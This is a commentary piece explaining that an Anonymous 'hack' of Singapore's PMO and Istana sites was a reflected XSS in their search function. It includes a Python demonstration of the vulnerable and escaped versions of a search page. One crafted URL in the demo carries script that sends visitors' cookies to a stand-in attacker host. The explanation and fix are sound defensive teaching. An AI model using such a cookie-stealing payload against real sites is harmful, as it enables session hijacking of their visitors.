By Chong Kai Xiong
Reports so far give the impression that the websites of PMO and Istana had been defaced, but this is wrong and misleading.
The websites themselves were not breached or modified in any way. The hack consisted merely of a specially crafted URL which, when opened in a browser, displays a search results page with the Anon marquee and banner overlaid on top.
The flaw lies in the websites' search function, which fails to sanitise search terms before echoing them back. When a search is run with terms that contain HTML or script code, the results page duly reproduces that code and the visitor's browser renders it as part of the page. This is what security practitioners call a reflected cross-site scripting (XSS) flaw: nothing is stored on the server, so without the specially crafted search terms (or the special URLs that carry them), nothing extraordinary happens.
Still, this is an elementary flaw, and it beggars belief that it had eluded the website developers. Depending on how the rest of the site is built, the flaw could have been exploited for darker purposes. At its simplest, it could be used to make the page display false information with the intention to mislead; in the worst case, it could be used to steal the login session or other data that a visitor's browser holds for the site, or to inject code that attacks the visitor's computer through a browser vulnerability. Little wonder, then, that the government chose to abruptly disable searching.
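To make the mechanism concrete, here is an added illustration written for this piece; it is not code from the PMO or Istana sites, whose software is not public. It simulates a search page that echoes its query, first as the flawed version and then with the one-line fix, and feeds both a crafted link. The hostnames and the two crafted URLs are invented for the example; the second URL shows the darker possibility mentioned above, script that sends the visitor's cookies to a third party.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed stand-in for a search endpoint like the one described in the
# article. Illustrative code only, not the real sites' software.
PAGE_TEMPLATE = (
    "<html><body><h1>Site search</h1>"
    "<p>Results for: {term}</p>"
    "<p>No matching pages.</p></body></html>"
)


def query_from_url(url: str) -> str:
    """Extract the 'q' parameter as a search endpoint would (percent-decoding included)."""
    params = parse_qs(urlsplit(url).query)
    return params.get("q", [""])[0]


def results_page_vulnerable(term: str) -> str:
    """The flaw: the search term is pasted straight into the HTML, so any
    tags it contains become part of the page the browser renders."""
    return PAGE_TEMPLATE.format(term=term)


def results_page_hardened(term: str) -> str:
    """The fix: HTML-escape the term so '<', '>', '&' and quotes are shown
    as text instead of being parsed as markup."""
    return PAGE_TEMPLATE.format(term=html.escape(term, quote=True))


def reflect(url: str, hardened: bool) -> str:
    """Simulate the server: take a link, build the results page it would return."""
    term = query_from_url(url)
    return results_page_hardened(term) if hardened else results_page_vulnerable(term)


def has_live_tag(page: str, tag: str) -> bool:
    """Crude check: does the page contain an unescaped opening <tag>?"""
    return f"<{tag}>" in page.lower()


# Two constructed crafted links (hypothetical hostnames). The first only paints
# a banner on the page, much like the Anon marquee. The second carries script
# that would ship the visitor's cookies for this site to an attacker's server.
BANNER_URL = (
    "https://search.example.gov.sg/search?q="
    "%3Cmarquee%3EAnon%20was%20here%3C%2Fmarquee%3E"
)
COOKIE_THEFT_URL = (
    "https://search.example.gov.sg/search?q="
    "%3Cscript%3Enew%20Image().src%3D%22https%3A%2F%2Fattacker.example%2F%3Fc%3D%22"
    "%2Bdocument.cookie%3C%2Fscript%3E"
)


if __name__ == "__main__":
    for label, url, tag in (("banner", BANNER_URL, "marquee"),
                            ("cookie theft", COOKIE_THEFT_URL, "script")):
        print(f"--- {label} link ---")
        print("decoded search term:", query_from_url(url))
        print("vulnerable page renders injected tag:", has_live_tag(reflect(url, False), tag))
        print("hardened page renders injected tag:  ", has_live_tag(reflect(url, True), tag))
        print(reflect(url, True))
```

The hardened page still shows the attacker's text verbatim in the "Results for:" line, which is exactly what the user searched for; it simply cannot execute. Note that `html.escape` is the right tool only when the term lands in ordinary page text; a term echoed inside an attribute, a URL or a script block needs escaping for that context, which is why real sites lean on a templating engine with auto-escaping rather than hand-rolled string building.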
Anon’s exploit is rather benign, done mostly for a laugh at government incompetence. It’s like publicly shouting and pointing everyone to a person’s open zipper.
Anon exposed a flaw that should have been closed long ago. One might even say that the government ought to thank Anon for highlighting it. Think of what criminal hackers could have done if they had found the hole first and kept it a secret.
There’s also a lesson for users. Keep your browsers up-to-date, and don’t blindly click through links, especially links carrying odd-looking search terms or other unusual parameters. With a flaw of this kind the attack reaches you only if you open the crafted URL, so a moment's scepticism before clicking is a real defence.
Chong Kai Xiong is currently a freelance software developer working in Singapore, who has been providing IT support and consultation for numerous civil groups.